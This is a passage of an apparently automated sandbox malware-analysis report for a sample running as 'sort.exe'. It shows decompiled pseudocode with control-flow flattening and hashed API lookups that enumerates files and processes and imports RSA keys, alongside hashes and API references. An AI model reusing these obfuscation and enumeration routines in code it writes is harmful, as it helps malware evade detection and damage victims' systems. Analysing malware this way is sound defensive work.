Part of subcall function 00425EC3: GetVersion.KERNEL32(?,00425F66,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425ED6

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
Instruction ID: b3ac33658b3b741abd4bb59a3792cd3dace0394c803b1a2d8ae3ffca9e92013f
Opcode Fuzzy Hash: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
Instruction Fuzzy Hash: 00F0497160472ADFCB20EF64FC84997B3ACFB18316B81203BE64582161D774B956DBAC

Uniqueness

Uniqueness Score: -1.00%

Function 004079AB, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004079AB(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x436f2c);
				InitializeCriticalSection( *0x436f1c);
				InitializeCriticalSection( *0x436f0c);
				InitializeCriticalSection( *0x436eec);
				return _t1;
			}

0x004079ab
0x004079b8
0x004079c0
0x004079c8
0x004079d0
0x004079d3

APIs

InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079B8
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C0
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C8
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079D0

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
Instruction ID: 7b146446db7a68f273d69e9c37099d6d57513ee84f4d93e1aa445e082747f6c1
Opcode Fuzzy Hash: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
Instruction Fuzzy Hash: 67C00235905135FADF516B75FC058493F25EB063A0312E172E5145103487631C15EFD8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sort.exe PID: 4564 Parent PID: 6240 sort.exeCOMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	55.7%
Signature Coverage:	1.7%
Total number of Nodes:	652
Total number of Limit Nodes:	79

Executed Functions

Function 02241030, Relevance: 18.4, APIs: 12, Instructions: 362
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(02244054,02244040), ref: 02241047
GetProcAddress.KERNEL32(00000000), ref: 0224104E

Part of subcall function 02241B30: SetLastError.KERNEL32(0000000D,?,02241070,?,00000040), ref: 02241B3D

SetLastError.KERNEL32(000000C1), ref: 02241096

Memory Dump Source

Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_sort.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 13a4e2be3492ecaeddccffed2350f6adae253cab09d42a21b5ff9c6403bcd1c7
Instruction ID: 07ef2cb1e3596bf1eeb5e36629daaece6eaeef176d10aab42109e3e8f25f29be
Opcode Fuzzy Hash: 13a4e2be3492ecaeddccffed2350f6adae253cab09d42a21b5ff9c6403bcd1c7
Instruction Fuzzy Hash: E2F1CAB4E10209EFDB08CFD4D984BADB7B1BF48304F208598E919AB355DB75EA91CB50

Uniqueness

Uniqueness Score: -1.00%

Function 022738F0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E022738F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v524;
				short _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				signed int _t24;
				intOrPtr* _t28;
				intOrPtr _t33;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				signed int _t49;
				int _t55;
				void* _t58;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t100;

				_t93 = __ecx;
				_t97 = __edx;
				_v1640 = __ecx;
				_t22 = 0x1b0f738d;
				_t58 = _v1640;
				goto L1;
				do {
					while(1) {
						L1:
						_t100 = _t22 - 0xd5d5438;
						if(_t100 <= 0) {
							break;
						}
						if(_t22 == 0x1b0f738d) {
							_t22 = 0x1c39f1c;
							continue;
						} else {
							if(_t22 != 0x3aa0d798) {
								goto L6;
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t24 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t24 & 0xffb9c0ef) + 0x651b5f5;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L30:
										if(_t97 == 0) {
											goto L29;
										} else {
											_t96 = E022734C0(0x227d260);
											_t28 =  *0x227dc60;
											if(_t28 == 0) {
												_t28 = E02273E80(_t58, E02273F20(0xe66945e6), 0xcca28b0d, _t97);
												 *0x227dc60 = _t28;
											}
											 *_t28( &_v524, 0x104, _t96, _t93,  &(_v1636.cFileName));
											E022738F0( &_v524, _t97, _a4, _a8);
											_t98 = _t98 + 0x1c;
											E02273460(_t96);
											_t22 = 0x60b76e4;
										}
									} else {
										_t33 = _v1590;
										if(_t33 == 0 || _t33 == 0x2e && _v1588 == 0) {
											L29:
											_t22 = 0x60b76e4;
										} else {
											goto L30;
										}
									}
								}
								continue;
							}
						}
						L40:
					}
					if(_t100 == 0) {
						if( *0x227e004 == 0) {
							 *0x227e004 = E02273E80(_t58, E02273F20(0xbb398380), 0xf53ce71f, _t97);
						}
						_t35 = FindFirstFileW( &_v1044,  &_v1636); // executed
						_t58 = _t35;
						if(_t58 == 0xffffffff) {
							return _t35;
						} else {
							_t22 = 0x3aa0d798;
							goto L1;
						}
					} else {
						if(_t22 == 0x1c39f1c) {
							_t95 = E022734C0(0x227d240);
							_t39 =  *0x227dc60;
							if(_t39 == 0) {
								_t39 = E02273E80(_t58, E02273F20(0xe66945e6), 0xcca28b0d, _t97);
								 *0x227dc60 = _t39;
							}
							 *_t39( &_v1044, 0x104, _t95, _t93);
							_t41 =  *0x227dea8;
							_t98 = _t98 + 0x10;
							if(_t41 == 0) {
								_t41 = E02273E80(_t58, E02273F20(0xbb398380), 0x97f883e, _t97);
								 *0x227dea8 = _t41;
							}
							_t94 =  *_t41();
							_t43 =  *0x227e1a0;
							if(_t43 == 0) {
								_t43 = E02273E80(_t58, E02273F20(0xbb398380), 0x26c3f343, _t97);
								 *0x227e1a0 = _t43;
							}
							 *_t43(_t94, 0, _t95);
							_t93 = _v1652;
							_t22 = 0xd5d5438;
							goto L1;
						} else {
							if(_t22 == 0x60b76e4) {
								if( *0x227dfd4 == 0) {
									 *0x227dfd4 = E02273E80(_t58, E02273F20(0xbb398380), 0xd3e90d14, _t97);
								}
								_t49 = FindNextFileW(_t58,  &_v1636); // executed
								asm("sbb eax, eax");
								_t22 = ( ~_t49 & 0x344f21a3) + 0x651b5f5;
								goto L1;
							} else {
								if(_t22 == 0x651b5f5) {
									if( *0x227e064 == 0) {
										 *0x227e064 = E02273E80(_t58, E02273F20(0xbb398380), 0xa4a77084, _t97);
									}
									_t55 = FindClose(_t58); // executed
									return _t55;
								}
								goto L6;
							}
						}
					}
					goto L40;
					L6:
				} while (_t22 != 0x36605fc2);
				return _t22;
				goto L40;
			}

0x022738fa
0x022738fc
0x022738fe
0x02273902
0x02273907
0x0227390b
0x02273910
0x02273910
0x02273910
0x02273910
0x02273915
0x00000000
0x00000000
0x02273a79
0x02273b62
0x00000000
0x02273a7f
0x02273a84
0x00000000
0x02273a8a
0x02273a8f
0x02273b48
0x02273b51
0x02273b58
0x02273a95
0x02273a9b
0x02273abf
0x02273ac1
0x00000000
0x02273ac3
0x02273acd
0x02273acf
0x02273ad6
0x02273ae9
0x02273aee
0x02273aee
0x02273b07
0x02273b23
0x02273b28
0x02273b2d
0x02273b32
0x02273b32
0x02273a9d
0x02273a9d
0x02273aa5
0x02273ab5
0x02273ab5
0x00000000
0x00000000
0x00000000
0x02273aa5
0x02273a9b
0x00000000
0x02273a8f
0x02273a84
0x00000000
0x02273a79
0x0227391b
0x02273a33
0x02273a4b
0x02273a4b
0x02273a5d
0x02273a5f
0x02273a64
0x02273b9d
0x02273a6a
0x02273a6a
0x00000000
0x02273a6a
0x02273921
0x02273926
0x02273992
0x02273994
0x0227399b
0x022739ae
0x022739b3
0x022739b3
0x022739c7
0x022739c9
0x022739ce
0x022739d3
0x022739e6
0x022739eb
0x022739eb
0x022739f2
0x022739f4
0x022739fb
0x02273a0e
0x02273a13
0x02273a13
0x02273a1c
0x02273a1e
0x02273a22
0x00000000
0x02273928
0x0227392d
0x02273953
0x0227396b
0x0227396b
0x02273976
0x0227397a
0x02273981
0x00000000
0x0227392f
0x02273934
0x02273b73
0x02273b8b
0x02273b8b
0x02273b91
0x00000000
0x02273b91
0x00000000
0x02273934
0x0227392d
0x02273926
0x00000000
0x0227393a
0x0227393a
0x0227394b
0x00000000

APIs

FindNextFileW.KERNELBASE(?,?,00000000,0227998D,16BF64F2,00000001), ref: 02273976
FindFirstFileW.KERNELBASE(?,?,00000000,0227998D,16BF64F2,00000001), ref: 02273A5D
FindClose.KERNELBASE(?,00000000,0227998D,16BF64F2,00000001), ref: 02273B91

Strings

Ei, xrefs: 0227399D
., xrefs: 02273A95
8T], xrefs: 02273A22
Ei, xrefs: 02273AD8
8T], xrefs: 02273910

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$8T]$8T]$Ei$Ei
API String ID: 3541575487-3972632629
Opcode ID: b020deec91cd406005055199104348e4e3b061d172992cba089a27be23da63c3
Instruction ID: 6369950f7e6e7ad1c15a0a2e300b6194211ded47f51dc50811043e109c094a14
Opcode Fuzzy Hash: b020deec91cd406005055199104348e4e3b061d172992cba089a27be23da63c3
Instruction Fuzzy Hash: 7951D775B2C30297D734EAF4A8456BF36D6ABC0244F10099DE946D7248EF75C805A7E3

Uniqueness

Uniqueness Score: -1.00%

Function 02274CB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E02274CB0(intOrPtr* __ecx, void* __edx) {
				void* _v556;
				void* _v560;
				void* __ebx;
				void* _t5;
				signed int _t7;
				int _t13;
				signed int _t17;
				void* _t24;
				intOrPtr* _t27;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t47;

				_t44 = _v560;
				_t27 = __ecx;
				_t43 = __edx;
				_t5 = 0x166df8ad;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t5 - 0x31709247;
						if(_t47 > 0) {
							break;
						}
						if(_t47 == 0) {
							_t17 =  *_t27( &_v556, _t43);
							asm("sbb eax, eax");
							_t5 = ( ~_t17 & 0xfe0bf6b3) + 0x395ce26e;
							continue;
						} else {
							if(_t5 == 0x1c199) {
								_v556 = 0x22c;
								if( *0x227deb4 == 0) {
									 *0x227deb4 = E02273E80(_t27, E02273F20(0xbb398380), 0x6e59538e, _t45);
								}
								L13:
								_t7 = Process32NextW(_t44,  &_v556); // executed
								asm("sbb eax, eax");
								_t5 = ( ~_t7 & 0xf813afd9) + 0x395ce26e;
								continue;
							} else {
								if(_t5 == 0x71faaa2) {
									if( *0x227dbd8 == 0) {
										 *0x227dbd8 = E02273E80(_t27, E02273F20(0xbb398380), 0xc9ddf643, _t45);
									}
									_t24 = CreateToolhelp32Snapshot(2, 0); // executed
									_t44 = _t24;
									if(_t44 == 0xffffffff) {
										return _t24;
									} else {
										_t5 = 0x1c199;
										continue;
									}
								} else {
									if(_t5 != 0x166df8ad) {
										goto L17;
									} else {
										_t5 = 0x71faaa2;
										continue;
									}
								}
							}
						}
						L25:
					}
					if(_t5 == 0x3768d921) {
						if( *0x227decc == 0) {
							 *0x227decc = E02273E80(_t27, E02273F20(0xbb398380), 0xc021696d, _t45);
						}
						goto L13;
					} else {
						if(_t5 == 0x395ce26e) {
							if( *0x227dc70 == 0) {
								 *0x227dc70 = E02273E80(_t27, E02273F20(0xbb398380), 0x560d239b, _t45);
							}
							_t13 = FindCloseChangeNotification(_t44); // executed
							return _t13;
						}
						goto L17;
					}
					goto L25;
					L17:
				} while (_t5 != 0x3925027b);
				return _t5;
				goto L25;
			}

0x02274cb8
0x02274cbc
0x02274cbf
0x02274cc1
0x02274cc6
0x02274cd0
0x02274cd0
0x02274cd0
0x02274cd0
0x02274cd5
0x00000000
0x00000000
0x02274cdb
0x02274d8a
0x02274d8e
0x02274d95
0x00000000
0x02274ce1
0x02274ce6
0x02274d42
0x02274d4c
0x02274d64
0x02274d64
0x02274d69
0x02274d6f
0x02274d73
0x02274d7a
0x00000000
0x02274ce8
0x02274ced
0x02274d08
0x02274d20
0x02274d20
0x02274d29
0x02274d2b
0x02274d30
0x02274e18
0x02274d36
0x02274d36
0x00000000
0x02274d36
0x02274cef
0x02274cf4
0x00000000
0x02274cfa
0x02274cfa
0x00000000
0x02274cfa
0x02274cf4
0x02274ced
0x02274ce6
0x00000000
0x02274cdb
0x02274da4
0x02274dc9
0x02274de1
0x02274de1
0x00000000
0x02274da6
0x02274dab
0x02274def
0x02274e07
0x02274e07
0x02274e0d
0x00000000
0x02274e0d
0x00000000
0x02274dab
0x00000000
0x02274dad
0x02274dad
0x02274dc1
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02274D29
Process32NextW.KERNEL32(00000000,?,?,00000000,?), ref: 02274D6F
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?), ref: 02274E0D

Strings

n\9, xrefs: 02274DA6

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: ChangeCloseCreateFindNextNotificationProcess32SnapshotToolhelp32
String ID: n\9
API String ID: 1306606082-3894687320
Opcode ID: 700e7657183f4b543fc826e4625b6bb02e1117b32992846c2cde27693a6cac42
Instruction ID: d64089e06e1161012324ad33e3f0acd67fd75fab90143870abedfdad1167cbeb
Opcode Fuzzy Hash: 700e7657183f4b543fc826e4625b6bb02e1117b32992846c2cde27693a6cac42
Instruction Fuzzy Hash: 2931097177C20297D714BAF9B45566E21FA9F80258F04096AF451C724CEB78CC59CBD3

Uniqueness

Uniqueness Score: -1.00%

Function 02272650, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E02272650(intOrPtr* __ecx) {
				char _v4;
				char _v8;
				intOrPtr _v32;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t21;
				intOrPtr _t26;
				signed int _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t32;
				intOrPtr* _t33;
				intOrPtr* _t35;
				signed int _t36;
				intOrPtr* _t37;
				intOrPtr _t39;
				intOrPtr* _t42;
				void* _t52;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t69;
				intOrPtr _t76;
				intOrPtr* _t84;
				intOrPtr* _t85;
				intOrPtr* _t91;
				intOrPtr* _t96;
				signed int _t97;
				void* _t108;
				void* _t110;
				void* _t111;

				_t96 = __ecx;
				_t97 = 0x50194b2;
				goto L1;
				do {
					while(1) {
						L1:
						_t110 = _t97 - 0x1e656080;
						if(_t110 > 0) {
							break;
						}
						if(_t110 == 0) {
							_t84 =  *0x227dddc;
							__eflags = _t84;
							if(_t84 == 0) {
								_t84 = E02273E80(_t52, E02273F20(0x667fdee), 0x41956823, _t108);
								 *0x227dddc = _t84;
							}
							_t16 =  *0x227e2e4; // 0x4d8ea8
							_t4 = _t16 + 0x18; // 0x4d8ec0
							_t17 =  *_t84( *((intOrPtr*)(_t16 + 8)), 0x8004, 0, 0, _t4); // executed
							__eflags = _t17;
							if(_t17 != 0) {
								return 1;
							} else {
								_t97 = 0x264cda0c;
								continue;
							}
						} else {
							_t111 = _t97 - 0xf71ec4a;
							if(_t111 > 0) {
								__eflags = _t97 - 0x1032ae84;
								if(_t97 == 0x1032ae84) {
									_t21 =  *0x227dccc; // 0x0
									__eflags = _t21;
									if(_t21 == 0) {
										_t21 = E02273E80(_t52, E02273F20(0x667fdee), 0x60964008, _t108);
										 *0x227dccc = _t21;
									}
									_t57 =  *0x227e2e4; // 0x4d8ea8
									 *_t21( *((intOrPtr*)(_t57 + 0x1c)));
									_t97 = 0x20769828;
									continue;
								} else {
									__eflags = _t97 - 0x17703602;
									if(_t97 == 0x17703602) {
										_t60 =  *0x227e2e4; // 0x4d8ea8
										E02274250(_t52, _t60);
										__eflags = 0;
										return 0;
									} else {
										goto L17;
									}
								}
							} else {
								if(_t111 == 0) {
									_t85 =  *0x227e13c;
									__eflags = _t85;
									if(_t85 == 0) {
										_t85 = E02273E80(_t52, E02273F20(0x667fdee), 0x5f84d0c6, _t108);
										 *0x227e13c = _t85;
									}
									_t26 =  *0x227e2e4; // 0x4d8ea8
									_t1 = _t26 + 0x20; // 0x4d8ec8
									_t27 =  *_t85( *((intOrPtr*)(_t26 + 8)), 0x660e, 1, _t1); // executed
									asm("sbb esi, esi");
									_t97 = ( ~_t27 & 0x0e32b1fc) + 0x1032ae84;
									continue;
								} else {
									if(_t97 == 0x50194b2) {
										_t30 = E022742F0(_t52, 0x24);
										 *0x227e2e4 = _t30;
										__eflags = _t30;
										if(_t30 == 0) {
											goto L18;
										} else {
											_t97 = 0x85ecca9;
											continue;
										}
									} else {
										if(_t97 != 0x85ecca9) {
											goto L17;
										} else {
											_t31 =  *0x227dee8;
											if(_t31 == 0) {
												_t31 = E02273E80(_t52, E02273F20(0x667fdee), 0x249f770b, _t108);
												 *0x227dee8 = _t31;
											}
											_t65 =  *0x227e2e4; // 0x4d8ea8
											_t32 =  *_t31(_t65 + 8, 0, 0, 0x18, 0xf0000040); // executed
											asm("sbb esi, esi");
											_t97 = ( ~_t32 & 0x0cc3aa0b) + 0x17703602;
											continue;
										}
									}
								}
							}
						}
						L47:
					}
					__eflags = _t97 - 0x2433e00d;
					if(__eflags > 0) {
						__eflags = _t97 - 0x264cda0c;
						if(_t97 != 0x264cda0c) {
							goto L17;
						} else {
							_t33 =  *0x227dccc; // 0x0
							__eflags = _t33;
							if(_t33 == 0) {
								_t33 = E02273E80(_t52, E02273F20(0x667fdee), 0x60964008, _t108);
								 *0x227dccc = _t33;
							}
							_t69 =  *0x227e2e4; // 0x4d8ea8
							 *_t33( *((intOrPtr*)(_t69 + 0x20)));
							_t97 = 0x1032ae84;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t35 =  *0x227e04c;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E02273E80(_t52, E02273F20(0x38bb5311), 0xa8366e55, _t108);
								 *0x227e04c = _t35;
							}
							_t36 =  *_t35(0x10001, 0x13,  *_t96,  *((intOrPtr*)(_t96 + 4)), 0x8000, 0,  &_v8,  &_v4); // executed
							asm("sbb esi, esi");
							_t97 = ( ~_t36 & 0x029e39b6) + 0x20769828;
							goto L1;
						} else {
							__eflags = _t97 - 0x20769828;
							if(_t97 == 0x20769828) {
								_t37 =  *0x227e084; // 0x0
								__eflags = _t37;
								if(_t37 == 0) {
									_t37 = E02273E80(_t52, E02273F20(0x667fdee), 0x476fbf6d, _t108);
									 *0x227e084 = _t37;
								}
								_t76 =  *0x227e2e4; // 0x4d8ea8
								 *_t37( *((intOrPtr*)(_t76 + 8)), 0);
								_t97 = 0x17703602;
								goto L1;
							} else {
								__eflags = _t97 - 0x2314d1de;
								if(_t97 == 0x2314d1de) {
									_t91 =  *0x227ddfc;
									__eflags = _t91;
									if(_t91 == 0) {
										_t91 = E02273E80(_t52, E02273F20(0x667fdee), 0xaba13237, _t108);
										 *0x227ddfc = _t91;
									}
									_t39 =  *0x227e2e4; // 0x4d8ea8
									_t6 = _t39 + 0x1c; // 0x4d8ec4
									 *_t91( *((intOrPtr*)(_t39 + 8)), _v8, _v4, 0, 0, _t6); // executed
									asm("sbb esi, esi");
									_t42 =  *0x227dd40;
									_t97 = (_t97 & 0xeefb5422) + 0x20769828;
									__eflags = _t42;
									if(_t42 == 0) {
										_t42 = E02273E80(_t52, E02273F20(0xbb398380), 0x7f92dfac, _t108);
										 *0x227dd40 = _t42;
									}
									 *_t42(_v32);
								}
								goto L17;
							}
						}
					}
					goto L47;
					L17:
					__eflags = _t97 - 0x16a1826b;
				} while (_t97 != 0x16a1826b);
				L18:
				__eflags = 0;
				return 0;
				goto L47;
			}

0x02272655
0x02272657
0x02272657
0x02272660
0x02272660
0x02272660
0x02272660
0x02272666
0x00000000
0x00000000
0x0227266c
0x022727bc
0x022727c2
0x022727c4
0x022727dc
0x022727de
0x022727de
0x022727e4
0x022727e9
0x022727f9
0x022727fb
0x022727fd
0x022729af
0x02272803
0x02272803
0x00000000
0x02272803
0x02272672
0x02272672
0x02272678
0x0227275b
0x02272761
0x02272783
0x02272788
0x0227278a
0x0227279d
0x022727a2
0x022727a2
0x022727a7
0x022727b0
0x022727b2
0x00000000
0x02272763
0x02272763
0x02272769
0x02272992
0x02272998
0x0227299e
0x022729a4
0x00000000
0x00000000
0x00000000
0x02272769
0x0227267e
0x0227267e
0x02272707
0x0227270d
0x0227270f
0x02272727
0x02272729
0x02272729
0x0227272f
0x02272734
0x02272742
0x02272748
0x02272750
0x00000000
0x02272684
0x0227268a
0x022726ef
0x022726f4
0x022726f9
0x022726fb
0x00000000
0x022726fd
0x022726fd
0x00000000
0x022726fd
0x0227268c
0x02272692
0x00000000
0x02272698
0x02272698
0x0227269f
0x022726b2
0x022726b7
0x022726b7
0x022726bc
0x022726d1
0x022726d7
0x022726df
0x00000000
0x022726df
0x02272692
0x0227268a
0x0227267e
0x02272678
0x00000000
0x0227266c
0x0227280d
0x02272813
0x0227294d
0x02272953
0x00000000
0x02272959
0x02272959
0x0227295e
0x02272960
0x02272973
0x02272978
0x02272978
0x0227297d
0x02272986
0x02272988
0x00000000
0x02272988
0x02272819
0x02272819
0x022728f3
0x022728f8
0x022728fa
0x0227290d
0x02272912
0x02272912
0x02272934
0x0227293a
0x02272942
0x00000000
0x0227281f
0x0227281f
0x02272825
0x022728b8
0x022728bd
0x022728bf
0x022728d2
0x022728d7
0x022728d7
0x022728dc
0x022728e7
0x022728e9
0x00000000
0x0227282b
0x0227282b
0x02272831
0x02272837
0x0227283d
0x0227283f
0x02272857
0x02272859
0x02272859
0x0227285f
0x02272864
0x02272877
0x0227287b
0x0227287d
0x02272888
0x0227288e
0x02272890
0x022728a3
0x022728a8
0x022728a8
0x022728b1
0x022728b1
0x00000000
0x02272831
0x02272825
0x02272819
0x00000000
0x0227276f
0x0227276f
0x0227276f
0x0227277c
0x0227277c
0x02272782
0x00000000

APIs

CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?,?), ref: 02272934

Strings

3$, xrefs: 0227280D

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: CryptDecodeObject
String ID: 3$
API String ID: 1207547050-3878113309
Opcode ID: fa8f45e971401e1020f7ca33c19f386941e99e399c66aaf1e538ba41540471ac
Instruction ID: 12826e05d7e38f037adbc14c6de1c31cd1f60fa36e9f79327aab1ae7629a35d3
Opcode Fuzzy Hash: fa8f45e971401e1020f7ca33c19f386941e99e399c66aaf1e538ba41540471ac
Instruction Fuzzy Hash: 20712F32F6C212DBCB14FAF5EC54B9A32A3AF84704F054569ED069B25CEB709C158BD2

Uniqueness

Uniqueness Score: -1.00%

Function 02278240, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E02278240(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t86;
				intOrPtr* _t88;
				void* _t100;
				void* _t101;
				intOrPtr* _t103;
				intOrPtr* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				unsigned int _t138;
				void* _t140;
				void* _t141;
				signed int _t142;
				intOrPtr _t144;
				void* _t145;
				void* _t148;

				_t145 = __ebp;
				_t112 = __ebx;
				_v592 = 0xe2e3;
				_v592 = _v592 ^ 0xd0dd7a16;
				_t142 = 0x20540118;
				_v592 = _v592 * 0x3d;
				_v592 = _v592 | 0xc45f2d48;
				_v592 = _v592 + 0xffffa838;
				_v592 = _v592 + 0xde6b;
				_v592 = _v592 ^ 0xf67dff2c;
				_v592 = _v592 + _v592 * 4 << 2;
				_v592 = _v592 ^ 0xf4577600;
				_v584 = 0xc2f;
				_v584 = _v584 << 0xb;
				_v584 = _v584 * 0x17;
				_v584 = _v584 >> 8;
				_v584 = _v584 ^ 0x0008c1c9;
				_v580 = 0xfdf2;
				_v580 = _v580 << 7;
				_v580 = _v580 ^ 0x007ef903;
				_v588 = 0xe94a;
				_v588 = _v588 ^ 0xa24bbed7;
				_v588 = _v588 | 0x3a5f93cf;
				_t113 = _v588;
				_t141 = _v580;
				_v588 = (_v588 - (0x2c9fb4d9 * _t113 >> 0x20) >> 1) + (0x2c9fb4d9 * _t113 >> 0x20) >> 6;
				_v588 = _v588 | 0xa489ddc5;
				_v588 = _v588 + 0xf775;
				_t138 = 0x1b4e81b5 * _v588 >> 0x20 >> 3;
				_v588 = _t138;
				_v588 = _v588 ^ 0x0235bf01;
				while(1) {
					L1:
					_t148 = _t142 - 0x17c5ef14;
					if(_t148 > 0) {
						break;
					}
					if(_t148 == 0) {
						_t86 =  *0x227dfec;
						__eflags = _t86;
						if(_t86 == 0) {
							_t111 = E02273F20(0xbb398380);
							_t138 = 0xd4fa8936;
							_t86 = E02273E80(_t112, _t111, 0xd4fa8936, _t145);
							 *0x227dfec = _t86;
						}
						 *_t86( &_v572);
						_t142 = 0x2295af4;
						continue;
					} else {
						if(_t142 == 0xa7036f) {
							_t88 =  *0x227de58;
							__eflags = _t88;
							if(_t88 == 0) {
								_t110 = E02273F20(0xbb398380);
								_t138 = 0xb1aefb5;
								_t88 = E02273E80(_t112, _t110, 0xb1aefb5, _t145);
								 *0x227de58 = _t88;
							}
							 *_t88(0,  &_v524, 0x104);
							_t142 = 0xfef53a6;
							continue;
						} else {
							if(_t142 == 0x2295af4) {
								_v580 = 0xa8c00;
								_v576 = 0;
								_v596 = E0227B590(_v580, _v576, 0x989680, 0);
								_v592 = _t138;
								_t140 = _v588 - _v564;
								_t144 = _v596;
								asm("sbb ecx, [esp+0x3c]");
								__eflags = _v584 - _v592;
								if(__eflags < 0) {
									goto L24;
								} else {
									if(__eflags > 0) {
										L29:
										return 1;
									} else {
										__eflags = _t140 - _t144;
										if(_t140 < _t144) {
											goto L24;
										} else {
											goto L29;
										}
									}
								}
							} else {
